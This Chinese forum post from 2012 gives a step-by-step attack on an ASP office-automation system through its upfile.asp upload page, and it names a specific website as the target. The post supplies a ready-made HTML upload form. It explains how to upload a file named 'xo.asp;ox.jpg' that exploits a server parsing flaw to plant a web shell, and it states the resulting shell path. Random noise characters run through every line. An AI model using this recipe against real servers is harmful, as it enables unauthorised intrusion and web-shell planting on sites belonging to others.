全能OA办公系统 上传漏洞
6 l: v( s) y6 ]" F
% B, s& o2 ^& F系统介绍:
7 C6 F* H' ?$ W, [/ s# }$ t
5 e8 c# o/ M$ _# `" i$ b; \9 N全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
1 \1 ^% z; r9 d- A9 z, B. q. }* s# y9 j; O! s
主要功能:
9 W( b/ g8 T, h5 Z' L& H/ t公司通告 ) Q% E- |0 e8 a$ ^( _0 ^2 k% p$ M* d
工作计划
3 L m9 q3 p/ ?. H4 K通讯助理 3 D! T) C1 H9 O u3 H! a
客户资源
6 t6 a3 B3 h. D& r# J. q* O! X+ C5 X我的公文 # d" k9 X! c. ~9 x
公文传阅
( o& J' U- ?1 @$ I: Q公共资源
1 y9 ]$ H% k Q9 m( Q资源预约
A6 j( W% Y" a7 }9 y今日考勤 # w0 c# W3 _6 W; X j, x
个人计划
' }% V5 C) x F9 J: w个人通讯录 & i% D, |5 o6 z- ]. y; ?4 ^0 w' Z# H9 w7 @
个人基本档案
1 t$ N" r! t" T( }6 _未读邮件
: m6 F# h4 h+ p- f x* r发邮件 ! }# @. U* F: f t, ^
收件夹 & x7 l4 G, y; X$ H6 u5 _& u$ {. P
寄件夹 ; N+ {/ n U v7 q% s
网络硬盘
$ t1 I" c% x* W# a$ |网络会议
" S% N0 H, m/ T. H/ j网络调查
( D0 s% z2 @; s. d; n交流论坛
) m8 j4 }3 A4 e* y2 H
% f& B5 o @4 |, D- k$ _8 g有兴趣测试的朋友可以下源码看看& c6 m0 w" A5 O/ _
: A9 j# c! Z& T源码下载:$ H8 U# V- c+ g$ }
& c* l# ]5 x& _9 |9 H
http://www.mycodes.net/30/4750.htm
% a `& W1 [5 M. x# Y7 g0 q
8 h1 {. E5 a" O) ^7 g漏洞介绍:: f# \# H+ b3 H# \! p
" v' P* t. [- [& q0 D4 H8 n$ D由upfile.asp上传文件漏洞引起$ K/ |0 o* e; O0 g
3 A o8 j- P3 Z: i5 @2 j. b
测试方法:0 Z- L9 [6 [9 ]1 I; E0 E# r
4 \( M) I, ]) N% A' q2 X! y
使用名小子上传http://www.itlynn.com/upfile.asp即可: T7 f5 [+ H1 p; `0 O5 c
. L V: Q9 t- D+ I* N6 A9 z如果upfile.asp文件被删除不存在。# p- ^* H. R( n8 w6 U1 a' v
. C% Q; l% u7 n1 D
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
0 V+ i# k5 Q8 \, C; O1 o- V( Q# r- Y5 D2 f
如果存在那么将如下代码保存为upfile.html。
. c& T1 G( E$ K& Y/ }+ a% K8 z! P5 c
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
, G# k E5 M: Z+ k# _2 K2 u2 o% [. E, U: g1 X
8 @8 V9 d: p& a# [( Z/ l
3 I" }- V# f* m01 <table border='0' align="center" cellpadding="5">
. ^+ k1 u$ b6 y) o) q
4 W& I/ E [9 X4 O02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> . l/ _2 k! p- s; l# ~* d3 x
6 m) r [" Y m; [
03 <tr> * |8 K, [0 ^5 d
0 M, m1 E6 i+ l" i8 E/ i04 <td>报错:</td>
+ s; ^& N1 u$ N8 S2 |/ R) h' t( q( i! \+ ]: B; H. _ ]( l0 { b
05 <td><input type='radio' name='errnumber' value='0'>
0 I M; C0 c" s$ O
5 ~2 n4 `4 s: s, D& u06 自动更名 2 k6 q; |$ N$ O; h
: i$ ^4 F5 w( `2 z. H4 J07 <input type='radio' name='errnumber' value='1' checked>
1 s6 b8 U4 {$ i/ e5 @4 E9 G: m# L8 y5 J/ P1 [ K) l6 |
08 报错方式
: s$ ]# c3 H( t w: ~' }3 a4 z9 B
09 <input type='radio' name='errnumber' value='2'> 4 o9 ]8 t! u5 K
; s6 O) F7 C0 P- f8 f1 I, F
10 直接覆盖</td>
. X0 h; T/ f, c% S6 I2 z3 ~, w9 ~1 }2 J! I* d' \
11 </tr> " K) _& K4 _ J4 g7 ? J* e' [6 i
0 O' x; {7 k' L. b0 U
12 <tr> ) S8 G- P! ~, y1 z& H3 b
' ^: w" Q. H- s9 p. P8 u: b
13 <td>主题:</td>
0 c9 }/ ?& F) e. g: ~( X
- u. |2 W5 @+ \0 [1 q( i, T9 l( u14 <td><input type='text' name='filename' size='30'></td>
2 c; a% O3 c; |; C. e1 w- r$ {; S8 v- Q+ H) Z; p) i: T: W
15 </tr> - Z9 {0 ]! \9 M- D4 @9 F0 H& Z5 |4 f
& Z. q# ^2 n2 S16 <tr>
; i* k. N1 c3 |/ m* _1 f: H- Q) ^, n6 \; \/ v# m% V
17 <td>文件:</td>
4 s9 e! L! ?& Y9 Q: n/ W' x& \( }4 B) R" ~# p4 K
18 <td><input type="file"name="fruit"size="30"></td> * y" \9 o B) {7 Q- }
! }, e" {/ a0 t, w# N$ F
19 </tr>
q6 _$ F/ Z- a) L
' z# G6 ]' a/ m- Z20 <tr>
7 a. T. d! J# h/ d! [
# z# D- O- }& t& o/ N21 <td valign='top'>简介:</td> - X1 B& }: ?$ a7 a' _
$ u$ [5 C1 @# j5 [+ a1 l+ V3 ~& e
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> % e& h1 r W# {9 U+ m7 y+ L" u
" o0 M( D" d$ A" f+ y; P
23 </tr>
) t! s, A# v# ^1 }5 ?3 k1 [
8 Y" F7 b( d1 P9 C24 ( J+ d9 K; b9 S! Y- w7 b0 |
5 V% u1 ?7 L% ?' s( ^: S25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> + \3 ? y6 N# _$ Q/ W
8 `& q C6 s1 E( b. ^" }
26 </tr>
% ~0 U: \2 p- O3 ]2 X0 x1 G& u/ t; q/ }3 \
27 </form>
. g, t$ x" b6 C1 ], }) p! q% l% h z, v- O
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
6 f& e, Z- p2 @, ~& J" W; P8 w
# |( Y7 e: _, s- n g 7 f1 N& k# m6 x
+ X; K6 E- M- c* Z s
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
! g& m5 f5 |' A+ `7 e
/ e& O; V* A4 s5 H) K' ^, V此漏洞需要配合解析漏洞利用。
" w5 j$ F5 A+ Q: R4 h* h* I8 A. ~1 {: h% g
|
发表于 2012-11-21 13:45:12
收藏
支持
反对